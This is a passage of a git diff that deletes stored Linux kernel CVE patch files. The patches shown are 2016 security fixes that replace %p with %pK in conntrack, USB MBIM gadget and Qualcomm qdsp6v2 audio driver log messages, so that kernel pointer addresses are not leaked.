-@@ -203,7 +203,7 @@ destroy_conntrack(struct nf_conntrack *nfct)
- 	struct net *net = nf_ct_net(ct);
- 	struct nf_conntrack_l4proto *l4proto;
- 
--	pr_debug("destroy_conntrack(%p)\n", ct);
-+	pr_debug("destroy_conntrack(%pK)\n", ct);
- 	NF_CT_ASSERT(atomic_read(&nfct->use) == 0);
- 	NF_CT_ASSERT(!timer_pending(&ct->timeout));
- 
-@@ -234,7 +234,7 @@ destroy_conntrack(struct nf_conntrack *nfct)
- 	if (ct->master)
- 		nf_ct_put(ct->master);
- 
--	pr_debug("destroy_conntrack: returning ct=%p to slab\n", ct);
-+	pr_debug("destroy_conntrack: returning ct=%pK to slab\n", ct);
- 	nf_conntrack_free(ct);
- }
- 
-@@ -496,7 +496,7 @@ __nf_conntrack_confirm(struct sk_buff *skb)
- 	/* No external references means no one else could have
- 	   confirmed us. */
- 	NF_CT_ASSERT(!nf_ct_is_confirmed(ct));
--	pr_debug("Confirming conntrack %p\n", ct);
-+	pr_debug("Confirming conntrack %pK\n", ct);
- 
- 	spin_lock_bh(&nf_conntrack_lock);
- 
-@@ -826,7 +826,7 @@ init_conntrack(struct net *net, struct nf_conn *tmpl,
- 	spin_lock_bh(&nf_conntrack_lock);
- 	exp = nf_ct_find_expectation(net, zone, tuple);
- 	if (exp) {
--		pr_debug("conntrack: expectation arrives ct=%p exp=%p\n",
-+		pr_debug("conntrack: expectation arrives ct=%pK exp=%pK\n",
- 			 ct, exp);
- 		/* Welcome, Mr. Bond.  We've been expecting you... */
- 		__set_bit(IPS_EXPECTED_BIT, &ct->status);
-@@ -916,14 +916,14 @@ resolve_normal_ct(struct net *net, struct nf_conn *tmpl,
- 	} else {
- 		/* Once we've had two way comms, always ESTABLISHED. */
- 		if (test_bit(IPS_SEEN_REPLY_BIT, &ct->status)) {
--			pr_debug("nf_conntrack_in: normal packet for %p\n", ct);
-+			pr_debug("nf_conntrack_in: normal packet for %pK\n", ct);
- 			*ctinfo = IP_CT_ESTABLISHED;
- 		} else if (test_bit(IPS_EXPECTED_BIT, &ct->status)) {
--			pr_debug("nf_conntrack_in: related packet for %p\n",
-+			pr_debug("nf_conntrack_in: related packet for %pK\n",
- 				 ct);
- 			*ctinfo = IP_CT_RELATED;
- 		} else {
--			pr_debug("nf_conntrack_in: new packet for %p\n", ct);
-+			pr_debug("nf_conntrack_in: new packet for %pK\n", ct);
- 			*ctinfo = IP_CT_NEW;
- 		}
- 		*set_reply = 0;
-@@ -1065,7 +1065,7 @@ void nf_conntrack_alter_reply(struct nf_conn *ct,
- 	/* Should be unconfirmed, so not in hash table yet */
- 	NF_CT_ASSERT(!nf_ct_is_confirmed(ct));
- 
--	pr_debug("Altering reply tuple of %p to ", ct);
-+	pr_debug("Altering reply tuple of %pK to ", ct);
- 	nf_ct_dump_tuple(newreply);
- 
- 	ct->tuplehash[IP_CT_DIR_REPLY].tuple = *newreply;
-@@ -1640,7 +1640,7 @@ int nf_conntrack_init_net(struct net *net)
- 		goto err_stat;
- 	}
- 
--	net->ct.slabname = kasprintf(GFP_KERNEL, "nf_conntrack_%p", net);
-+	net->ct.slabname = kasprintf(GFP_KERNEL, "nf_conntrack_%pK", net);
- 	if (!net->ct.slabname) {
- 		ret = -ENOMEM;
- 		goto err_slabname;
diff --git a/Patches/Linux_CVEs/CVE-2016-8407/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8407/ANY/0001.patch
deleted file mode 100644
index 7d41297b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8407/ANY/0001.patch
+++ /dev/null
@@ -1,157 +0,0 @@
-From c01b4ad61a7e4291ea3db18baaf6c3532eff7e38 Mon Sep 17 00:00:00 2001
-From: Min Chong <mchong@google.com>
-Date: Fri, 14 Oct 2016 13:38:11 -0700
-Subject: [PATCH] usb: gadget: f_mbim: Change %p to %pK in debug messages
-
-The format specifier %p can leak kernel addresses
-while not valuing the kptr_restrict system settings.
-Use %pK instead of %p, which also evaluates whether
-kptr_restrict is set.
-
-Bug: 31802656
-Change-Id: I74e83192e0379586469edba3c7579a1cd75cf3c0
-Signed-off-by: Min Chong <mchong@google.com>
----
- drivers/usb/gadget/f_mbim.c | 34 +++++++++++++++++-----------------
- 1 file changed, 17 insertions(+), 17 deletions(-)
-
-diff --git a/drivers/usb/gadget/f_mbim.c b/drivers/usb/gadget/f_mbim.c
-index d1d10e07eb8db..797756dc46548 100644
---- a/drivers/usb/gadget/f_mbim.c
-+++ b/drivers/usb/gadget/f_mbim.c
-@@ -589,24 +589,24 @@ static void fmbim_ctrl_response_available(struct f_mbim *dev)
- 	unsigned long			flags;
- 	int				ret;
- 
--	pr_debug("dev:%p portno#%d\n", dev, dev->port_num);
-+	pr_debug("dev:%pK portno#%d\n", dev, dev->port_num);
- 
- 	spin_lock_irqsave(&dev->lock, flags);
- 
- 	if (!atomic_read(&dev->online)) {
--		pr_err("dev:%p is not online\n", dev);
-+		pr_err("dev:%pK is not online\n", dev);
- 		spin_unlock_irqrestore(&dev->lock, flags);
- 		return;
- 	}
- 
- 	if (!req) {
--		pr_err("dev:%p req is NULL\n", dev);
-+		pr_err("dev:%pK req is NULL\n", dev);
- 		spin_unlock_irqrestore(&dev->lock, flags);
- 		return;
- 	}
- 
- 	if (!req->buf) {
--		pr_err("dev:%p req->buf is NULL\n", dev);
-+		pr_err("dev:%pK req->buf is NULL\n", dev);
- 		spin_unlock_irqrestore(&dev->lock, flags);
- 		return;
- 	}
-@@ -645,21 +645,21 @@ fmbim_send_cpkt_response(struct f_mbim *gr, struct ctrl_pkt *cpkt)
- 	unsigned long	flags;
- 
- 	if (!gr || !cpkt) {
--		pr_err("Invalid cpkt, dev:%p cpkt:%p\n",
-+		pr_err("Invalid cpkt, dev:%pK cpkt:%pK\n",
- 				gr, cpkt);
- 		return -ENODEV;
- 	}
- 
--	pr_debug("dev:%p port_num#%d\n", dev, dev->port_num);
-+	pr_debug("dev:%pK port_num#%d\n", dev, dev->port_num);
- 
- 	if (!atomic_read(&dev->online)) {
--		pr_err("dev:%p is not connected\n", dev);
-+		pr_err("dev:%pK is not connected\n", dev);
- 		mbim_free_ctrl_pkt(cpkt);
- 		return 0;
- 	}
- 
- 	if (dev->not_port.notify_state != MBIM_NOTIFY_RESPONSE_AVAILABLE) {
--		pr_err("dev:%p state=%d, recover!!\n", dev,
-+		pr_err("dev:%pK state=%d, recover!!\n", dev,
- 			dev->not_port.notify_state);
- 		mbim_free_ctrl_pkt(cpkt);
- 		return 0;
-@@ -700,7 +700,7 @@ static int mbim_bam_connect(struct f_mbim *dev)
- 	enum peer_bam bam_name = (dev->xport == USB_GADGET_XPORT_BAM2BAM_IPA) ?
- 							IPA_P_BAM : A2_P_BAM;
- 
--	pr_info("dev:%p portno:%d\n", dev, dev->port_num);
-+	pr_info("dev:%pK portno:%d\n", dev, dev->port_num);
- 
- 	src_connection_idx = usb_bam_get_connection_idx(gadget->name, bam_name,
- 		USB_TO_PEER_PERIPHERAL, USB_BAM_DEVICE, dev->port_num);
-@@ -727,7 +727,7 @@ static int mbim_bam_connect(struct f_mbim *dev)
- 
- static int mbim_bam_disconnect(struct f_mbim *dev)
- {
--	pr_info("%s - dev:%p port:%d\n", __func__, dev, dev->port_num);
-+	pr_info("%s - dev:%pK port:%d\n", __func__, dev, dev->port_num);
- 	bam_data_disconnect(&dev->bam_port, dev->port_num);
- 
- 	return 0;
-@@ -862,7 +862,7 @@ static void mbim_notify_complete(struct usb_ep *ep, struct usb_request *req)
- 	struct f_mbim			*mbim = req->context;
- 	struct usb_cdc_notification	*event = req->buf;
- 
--	pr_debug("dev:%p\n", mbim);
-+	pr_debug("dev:%pK\n", mbim);
- 
- 	spin_lock(&mbim->lock);
- 	switch (req->status) {
-@@ -892,7 +892,7 @@ static void mbim_notify_complete(struct usb_ep *ep, struct usb_request *req)
- 	mbim_do_notify(mbim);
- 	spin_unlock(&mbim->lock);
- 
--	pr_debug("dev:%p Exit\n", mbim);
-+	pr_debug("dev:%pK Exit\n", mbim);
- }
- 
- static void mbim_ep0out_complete(struct usb_ep *ep, struct usb_request *req)
-@@ -903,7 +903,7 @@ static void mbim_ep0out_complete(struct usb_ep *ep, struct usb_request *req)
- 	struct f_mbim		*mbim = func_to_mbim(f);
- 	struct mbim_ntb_input_size *ntb = NULL;
- 
--	pr_debug("dev:%p\n", mbim);
-+	pr_debug("dev:%pK\n", mbim);
- 
- 	req->context = NULL;
- 	if (req->status || req->actual != req->length) {
-@@ -941,7 +941,7 @@ static void mbim_ep0out_complete(struct usb_ep *ep, struct usb_request *req)
- invalid:
- 	usb_ep_set_halt(ep);
- 
--	pr_err("dev:%p Failed\n", mbim);
-+	pr_err("dev:%pK Failed\n", mbim);
- 
- 	return;
- }
-@@ -963,7 +963,7 @@ fmbim_cmd_complete(struct usb_ep *ep, struct usb_request *req)
- 		return;
- 	}
- 
--	pr_debug("dev:%p port#%d\n", dev, dev->port_num);
-+	pr_debug("dev:%pK port#%d\n", dev, dev->port_num);
- 
- 	cpkt = mbim_alloc_ctrl_pkt(len, GFP_ATOMIC);
- 	if (!cpkt) {
-@@ -1313,7 +1313,7 @@ static int mbim_set_alt(struct usb_function *f, unsigned intf, unsigned alt)
- 					return ret;
- 				}
- 
--				pr_info("Set mbim port in_desc = 0x%p",
-+				pr_info("Set mbim port in_desc = 0x%pK",
- 					mbim->bam_port.in->desc);
- 
- 				ret = config_ep_by_speed(cdev->gadget, f,
-@@ -1325,7 +1325,7 @@ static int mbim_set_alt(struct usb_function *f, unsigned intf, unsigned alt)
- 					return ret;
- 				}
- 
--				pr_info("Set mbim port out_desc = 0x%p",
-+				pr_info("Set mbim port out_desc = 0x%pK",
- 					mbim->bam_port.out->desc);
- 
- 				if (mbim->xport == USB_GADGET_XPORT_BAM2BAM_IPA
diff --git a/Patches/Linux_CVEs/CVE-2016-8410/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8410/ANY/0001.patch
deleted file mode 100644
index 399fe062..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8410/ANY/0001.patch
+++ /dev/null
@@ -1,1747 +0,0 @@
-From e2bbf665187a1f0a1248e4a088823cb182153ba9 Mon Sep 17 00:00:00 2001
-From: Ben Romberger <bromberg@codeaurora.org>
-Date: Wed, 18 May 2016 17:15:50 -0700
-Subject: ASoC: msm: qdsp6v2: Change audio drivers to use %pK
-
-Change all qdsp6v2 audio driver to use %pK instead
-of %p. %pK hides addresses when the users doesn't
-have kernel permissions. If address information
-is needed echo 0 > /proc/sys/kernel/kptr_restrict.
-
-Change-Id: I7baa9f127266726fecf9238167a1e0128a258847
-Signed-off-by: Ben Romberger <bromberg@codeaurora.org>
-Signed-off-by: Surendar karka <sukark@codeaurora.org>
----
- drivers/soc/qcom/qdsp6v2/apr.c                | 12 ++--
- drivers/soc/qcom/qdsp6v2/msm_audio_ion.c      | 37 ++++++------
- sound/soc/msm/qdsp6v2/audio_cal_utils.c       |  4 +-
- sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c       | 16 +++---
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c    |  4 +-
- sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c         |  4 +-
- sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c    |  4 +-
- sound/soc/msm/qdsp6v2/msm-dts-eagle.c         | 32 +++++------
- sound/soc/msm/qdsp6v2/msm-dts-srs-tm-config.c |  4 +-
- sound/soc/msm/qdsp6v2/msm-lsm-client.c        | 24 ++++----
- sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c        |  6 +-
- sound/soc/msm/qdsp6v2/msm-pcm-host-voice-v2.c |  6 +-
- sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c        |  6 +-
- sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c         |  6 +-
- sound/soc/msm/qdsp6v2/q6adm.c                 | 24 ++++----
- sound/soc/msm/qdsp6v2/q6afe.c                 | 28 ++++-----
- sound/soc/msm/qdsp6v2/q6asm.c                 | 82 +++++++++++++--------------
- sound/soc/msm/qdsp6v2/q6core.c                |  8 +--
- sound/soc/msm/qdsp6v2/q6lsm.c                 | 22 +++----
- sound/soc/msm/qdsp6v2/q6voice.c               | 28 ++++-----
- sound/soc/msm/qdsp6v2/rtac.c                  | 26 ++++-----
- 21 files changed, 192 insertions(+), 191 deletions(-)
-
-diff --git a/drivers/soc/qcom/qdsp6v2/apr.c b/drivers/soc/qcom/qdsp6v2/apr.c
-index e88703d..06e7a05 100644
---- a/drivers/soc/qcom/qdsp6v2/apr.c
-+++ b/drivers/soc/qcom/qdsp6v2/apr.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -513,7 +513,7 @@ void apr_cb_func(void *buf, int len, void *priv)
- 	pr_debug("\n*****************\n");
- 
- 	if (!buf || len <= APR_HDR_SIZE) {
--		pr_err("APR: Improper apr pkt received:%p %d\n", buf, len);
-+		pr_err("APR: Improper apr pkt received:%pK %d\n", buf, len);
- 		return;
- 	}
- 	hdr = buf;
-@@ -599,7 +599,7 @@ void apr_cb_func(void *buf, int len, void *priv)
- 		return;
- 	}
- 	pr_debug("svc_idx = %d\n", i);
--	pr_debug("%x %x %x %p %p\n", c_svc->id, c_svc->dest_id,
-+	pr_debug("%x %x %x %pK %pK\n", c_svc->id, c_svc->dest_id,
- 		 c_svc->client_id, c_svc->fn, c_svc->priv);
- 	data.payload_size = hdr->pkt_size - hdr_size;
- 	data.opcode = hdr->opcode;
-@@ -663,7 +663,7 @@ static void apr_reset_deregister(struct work_struct *work)
- 			container_of(work, struct apr_reset_work, work);
- 
- 	handle = apr_reset->handle;
--	pr_debug("%s:handle[%p]\n", __func__, handle);
-+	pr_debug("%s:handle[%pK]\n", __func__, handle);
- 	apr_deregister(handle);
- 	kfree(apr_reset);
- }
-@@ -696,7 +696,7 @@ int apr_deregister(void *handle)
- 		client[dest_id][client_id].svc_cnt--;
- 		if (!client[dest_id][client_id].svc_cnt) {
- 			svc->need_reset = 0x0;
--			pr_debug("%s: service is reset %p\n", __func__, svc);
-+			pr_debug("%s: service is reset %pK\n", __func__, svc);
- 		}
- 	}
- 
-@@ -724,7 +724,7 @@ void apr_reset(void *handle)
- 
- 	if (!handle)
- 		return;
--	pr_debug("%s: handle[%p]\n", __func__, handle);
-+	pr_debug("%s: handle[%pK]\n", __func__, handle);
- 
- 	if (apr_reset_workqueue == NULL) {
- 		pr_err("%s: apr_reset_workqueue is NULL\n", __func__);
-diff --git a/drivers/soc/qcom/qdsp6v2/msm_audio_ion.c b/drivers/soc/qcom/qdsp6v2/msm_audio_ion.c
-index 52c97e4..470be30 100644
---- a/drivers/soc/qcom/qdsp6v2/msm_audio_ion.c
-+++ b/drivers/soc/qcom/qdsp6v2/msm_audio_ion.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -103,11 +103,11 @@ int msm_audio_ion_alloc(const char *name, struct ion_client **client,
- 		pr_err("%s: ION memory mapping for AUDIO failed\n", __func__);
- 		goto err_ion_handle;
- 	}
--	pr_debug("%s: mapped address = %p, size=%zd\n", __func__,
-+	pr_debug("%s: mapped address = %pK, size=%zd\n", __func__,
- 		*vaddr, bufsz);
- 
- 	if (bufsz != 0) {
--		pr_debug("%s: memset to 0 %p %zd\n", __func__, *vaddr, bufsz);
-+		pr_debug("%s: memset to 0 %pK %zd\n", __func__, *vaddr, bufsz);
- 		memset((void *)*vaddr, 0, bufsz);
- 	}
- 
-@@ -153,7 +153,7 @@ int msm_audio_ion_import(const char *name, struct ion_client **client,
- 	bufsz should be 0 and fd shouldn't be 0 as of now
- 	*/
- 	*handle = ion_import_dma_buf(*client, fd);
--	pr_debug("%s: DMA Buf name=%s, fd=%d handle=%p\n", __func__,
-+	pr_debug("%s: DMA Buf name=%s, fd=%d handle=%pK\n", __func__,
- 							name, fd, *handle);
- 	if (IS_ERR_OR_NULL((void *) (*handle))) {
- 		pr_err("%s: ion import dma buffer failed\n",
-@@ -184,7 +184,7 @@ int msm_audio_ion_import(const char *name, struct ion_client **client,
- 		rc = -ENOMEM;
- 		goto err_ion_handle;
- 	}
--	pr_debug("%s: mapped address = %p, size=%zd\n", __func__,
-+	pr_debug("%s: mapped address = %pK, size=%zd\n", __func__,
- 		*vaddr, bufsz);
- 
- 	return 0;
-@@ -207,7 +207,7 @@ int msm_audio_ion_free(struct ion_client *client, struct ion_handle *handle)
- 	}
- 	if (msm_audio_ion_data.smmu_enabled) {
- 		/* Need to populate book kept infomation */
--		pr_debug("client=%p, domain=%p, domain_id=%d, group=%p",
-+		pr_debug("client=%pK, domain=%pK, domain_id=%d, group=%pK",
- 			client, msm_audio_ion_data.domain,
- 			msm_audio_ion_data.domain_id, msm_audio_ion_data.group);
- 
-@@ -273,7 +273,7 @@ int msm_audio_ion_mmap(struct audio_buffer *ab,
- 				offset = 0;
- 			}
- 			len = min(len, remainder);
--			pr_debug("vma=%p, addr=%x len=%ld vm_start=%x vm_end=%x vm_page_prot=%ld\n",
-+			pr_debug("vma=%pK, addr=%x len=%ld vm_start=%x vm_end=%x vm_page_prot=%ld\n",
- 				vma, (unsigned int)addr, len,
- 				(unsigned int)vma->vm_start,
- 				(unsigned int)vma->vm_end,
-@@ -296,8 +296,8 @@ int msm_audio_ion_mmap(struct audio_buffer *ab,
- 				, __func__ , ret);
- 			return ret;
- 		}
--		pr_debug("phys=%pa len=%zd\n", &phys_addr, phys_len);
--		pr_debug("vma=%p, vm_start=%x vm_end=%x vm_pgoff=%ld vm_page_prot=%ld\n",
-+		pr_debug("phys=%pK len=%zd\n", &phys_addr, phys_len);
-+		pr_debug("vma=%pK, vm_start=%x vm_end=%x vm_pgoff=%ld vm_page_prot=%ld\n",
- 			vma, (unsigned int)vma->vm_start,
- 			(unsigned int)vma->vm_end, vma->vm_pgoff,
- 			(unsigned long int)vma->vm_page_prot);
-@@ -333,7 +333,7 @@ struct ion_client *msm_audio_ion_client_create(const char *name)
- 
- void msm_audio_ion_client_destroy(struct ion_client *client)
- {
--	pr_debug("%s: client = %p smmu_enabled = %d\n", __func__,
-+	pr_debug("%s: client = %pK smmu_enabled = %d\n", __func__,
- 		client, msm_audio_ion_data.smmu_enabled);
- 
- 	ion_client_destroy(client);
-@@ -355,7 +355,7 @@ int msm_audio_ion_import_legacy(const char *name, struct ion_client *client,
- 	bufsz should be 0 and fd shouldn't be 0 as of now
- 	*/
- 	*handle = ion_import_dma_buf(client, fd);
--	pr_debug("%s: DMA Buf name=%s, fd=%d handle=%p\n", __func__,
-+	pr_debug("%s: DMA Buf name=%s, fd=%d handle=%pK\n", __func__,
- 							name, fd, *handle);
- 	if (IS_ERR_OR_NULL((void *)(*handle))) {
- 		pr_err("%s: ion import dma buffer failed\n",
-@@ -421,7 +421,7 @@ int msm_audio_ion_cache_operations(struct audio_buffer *abuff, int cache_op)
- 	int msm_cache_ops = 0;
- 
- 	if (!abuff) {
--		pr_err("Invalid params: %p, %p\n", __func__, abuff);
-+		pr_err("%s: Invalid params: %pK\n", __func__, abuff);
- 		return -EINVAL;
- 	}
- 	rc = ion_handle_get_flags(abuff->client, abuff->handle,
-@@ -467,7 +467,7 @@ static int msm_audio_ion_get_phys(struct ion_client *client,
- 			pr_err("%s: ION map iommu failed %d\n", __func__, rc);
- 			return rc;
- 		}
--		pr_debug("client=%p, domain=%p, domain_id=%d, group=%p",
-+		pr_debug("client=%pK, domain=%pK, domain_id=%d, group=%pK",
- 			client, msm_audio_ion_data.domain,
- 			msm_audio_ion_data.domain_id, msm_audio_ion_data.group);
- 		/* Append the SMMU SID information to the address */
-@@ -476,7 +476,8 @@ static int msm_audio_ion_get_phys(struct ion_client *client,
- 		/* SMMU is disabled*/
- 		rc = ion_phys(client, handle, addr, len);
- 	}
--	pr_debug("phys=%pa, len=%zd, rc=%d\n", &(*addr), *len, rc);
-+	pr_debug("phys=%pK, len=%zd, rc=%d\n", &(*addr), *len, rc);
-+
- 	return rc;
- }
- 
-@@ -540,18 +541,18 @@ static int msm_audio_ion_probe(struct platform_device *pdev)
- 		msm_audio_ion_data.domain =
- 			iommu_group_get_iommudata(msm_audio_ion_data.group);
- 		if (IS_ERR_OR_NULL(msm_audio_ion_data.domain)) {
--			pr_err("Failed to get domain data for group %p",
-+			pr_err("Failed to get domain data for group %pK",
- 					msm_audio_ion_data.group);
- 			goto fail_group;
- 		}
- 		msm_audio_ion_data.domain_id =
- 				msm_find_domain_no(msm_audio_ion_data.domain);
- 		if (msm_audio_ion_data.domain_id < 0) {
--			pr_err("Failed to get domain index for domain %p",
-+			pr_err("Failed to get domain index for domain %pK",
- 					msm_audio_ion_data.domain);
- 			goto fail_group;
- 		}
--		pr_debug("domain=%p, domain_id=%d, group=%p",
-+		pr_debug("domain=%pK, domain_id=%d, group=%pK",
- 			msm_audio_ion_data.domain,
- 			msm_audio_ion_data.domain_id, msm_audio_ion_data.group);
- 
-@@ -575,7 +576,7 @@ fail_group:
- 
- static int msm_audio_ion_remove(struct platform_device *pdev)
- {
--	pr_debug("%s: msm audio ion is unloaded, domain=%p, group=%p\n",
-+	pr_debug("%s: msm audio ion is unloaded, domain=%pK, group=%pK\n",
- 		__func__, msm_audio_ion_data.domain, msm_audio_ion_data.group);
- 	iommu_detach_group(msm_audio_ion_data.domain, msm_audio_ion_data.group);
- 
-diff --git a/sound/soc/msm/qdsp6v2/audio_cal_utils.c b/sound/soc/msm/qdsp6v2/audio_cal_utils.c
-index 67275df..562e9a1 100644
---- a/sound/soc/msm/qdsp6v2/audio_cal_utils.c
-+++ b/sound/soc/msm/qdsp6v2/audio_cal_utils.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -599,7 +599,7 @@ static struct cal_block_data *create_cal_block(struct cal_type_data *cal_type,
- 		goto err;
- 	}
- 	cal_block->buffer_number = basic_cal->cal_hdr.buffer_number;
--	pr_debug("%s: created block for cal type %d, buf num %d, map handle %d, map size %zd paddr 0x%pa!\n",
-+	pr_debug("%s: created block for cal type %d, buf num %d, map handle %d, map size %zd paddr 0x%pK!\n",
- 		__func__, cal_type->info.reg.cal_type,
- 		cal_block->buffer_number,
- 		cal_block->map_data.ion_map_handle,
-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-index 82de46c..5071be9 100644
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014, 2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -192,7 +192,7 @@ static void compr_event_handler(uint32_t opcode,
- 		pr_debug("%s:writing %d bytes of buffer[%d] to dsp 2\n",
- 				__func__, prtd->pcm_count, prtd->out_head);
- 		temp = buf[0].phys + (prtd->out_head * prtd->pcm_count);
--		pr_debug("%s:writing buffer[%d] from 0x%pa\n",
-+		pr_debug("%s:writing buffer[%d] from 0x%pK\n",
- 			__func__, prtd->out_head, &temp);
- 
- 		if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE)
-@@ -243,7 +243,7 @@ static void compr_event_handler(uint32_t opcode,
- 		break;
- 	case ASM_DATA_EVENT_READ_DONE_V2: {
- 		pr_debug("ASM_DATA_EVENT_READ_DONE\n");
--		pr_debug("buf = %p, data = 0x%X, *data = %p,\n"
-+		pr_debug("buf = %pK, data = 0x%X, *data = %pK,\n"
- 			 "prtd->pcm_irq_pos = %d\n",
- 				prtd->audio_client->port[OUT].buf,
- 			 *(uint32_t *)prtd->audio_client->port[OUT].buf->data,
-@@ -253,7 +253,7 @@ static void compr_event_handler(uint32_t opcode,
- 		memcpy(prtd->audio_client->port[OUT].buf->data +
- 			   prtd->pcm_irq_pos, (ptrmem + READDONE_IDX_SIZE),
- 			   COMPRE_CAPTURE_HEADER_SIZE);
--		pr_debug("buf = %p, updated data = 0x%X, *data = %p\n",
-+		pr_debug("buf = %pK, updated data = 0x%X, *data = %pK\n",
- 				prtd->audio_client->port[OUT].buf,
- 			*(uint32_t *)(prtd->audio_client->port[OUT].buf->data +
- 				prtd->pcm_irq_pos),
-@@ -269,7 +269,7 @@ static void compr_event_handler(uint32_t opcode,
- 		}
- 		buf = prtd->audio_client->port[OUT].buf;
- 
--		pr_debug("pcm_irq_pos=%d, buf[0].phys = 0x%pa\n",
-+		pr_debug("pcm_irq_pos=%d, buf[0].phys = 0x%pK\n",
- 				prtd->pcm_irq_pos, &buf[0].phys);
- 		read_param.len = prtd->pcm_count - COMPRE_CAPTURE_HEADER_SIZE;
- 		read_param.paddr = buf[0].phys +
-@@ -295,7 +295,7 @@ static void compr_event_handler(uint32_t opcode,
- 			pr_debug("%s: writing %d bytes of buffer[%d] to dsp\n",
- 				__func__, prtd->pcm_count, prtd->out_head);
- 			buf = prtd->audio_client->port[IN].buf;
--			pr_debug("%s: writing buffer[%d] from 0x%pa head %d count %d\n",
-+			pr_debug("%s: writing buffer[%d] from 0x%pK head %d count %d\n",
- 				__func__, prtd->out_head, &buf[0].phys,
- 				prtd->pcm_count, prtd->out_head);
- 			if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE)
-@@ -602,7 +602,7 @@ static int msm_compr_capture_prepare(struct snd_pcm_substream *substream)
- 					- COMPRE_CAPTURE_HEADER_SIZE;
- 			read_param.paddr = buf[i].phys
- 					+ COMPRE_CAPTURE_HEADER_SIZE;
--			pr_debug("Push buffer [%d] to DSP, paddr: %pa, vaddr: %p\n",
-+			pr_debug("Push buffer [%d] to DSP, paddr: %pK, vaddr: %pK\n",
- 					i, &read_param.paddr,
- 					buf[i].data);
- 			q6asm_async_read(prtd->audio_client, &read_param);
-@@ -963,7 +963,7 @@ static int msm_compr_hw_params(struct snd_pcm_substream *substream,
- 	dma_buf->addr =  buf[0].phys;
- 	dma_buf->bytes = runtime->hw.buffer_bytes_max;
- 
--	pr_debug("%s: buf[%p]dma_buf->area[%p]dma_buf->addr[%pa]\n"
-+	pr_debug("%s: buf[%pK]dma_buf->area[%pK]dma_buf->addr[%pK]\n"
- 		 "dma_buf->bytes[%zd]\n", __func__,
- 		 (void *)buf, (void *)dma_buf->area,
- 		 &dma_buf->addr, dma_buf->bytes);
-diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-index bb0cb9f..7aac112 100644
---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -2056,7 +2056,7 @@ static int msm_compr_get_caps(struct snd_compr_stream *cstream,
- 		memcpy(arg, &prtd->compr_cap, sizeof(struct snd_compr_caps));
- 	} else {
- 		ret = -EINVAL;
--		pr_err("%s: arg (0x%p), prtd (0x%p)\n", __func__, arg, prtd);
-+		pr_err("%s: arg (0x%pK), prtd (0x%pK)\n", __func__, arg, prtd);
- 	}
- 
- 	return ret;
-diff --git a/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c
-index ee5a340..8ef8f49 100644
---- a/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dai-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1861,7 +1861,7 @@ static int msm_auxpcm_dev_probe(struct platform_device *pdev)
- 		goto fail_pdata_nomem;
- 	}
- 
--	dev_dbg(&pdev->dev, "%s: dev %p, dai_data %p, auxpcm_pdata %p\n",
-+	dev_dbg(&pdev->dev, "%s: dev %pK, dai_data %pK, auxpcm_pdata %pK\n",
- 		__func__, &pdev->dev, dai_data, auxpcm_pdata);
- 
- 	rc = of_property_read_u32_array(pdev->dev.of_node,
-diff --git a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-index ace747d..fea7bb4 100644
---- a/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-ds2-dap-config.c
-@@ -1103,7 +1103,7 @@ static int msm_ds2_dap_send_end_point(int dev_map_idx, int endp_idx)
- 	ds2_ap_params_obj = &ds2_dap_params[cache_device];
- 	pr_debug("%s: cache dev %d, dev_map_idx %d\n", __func__,
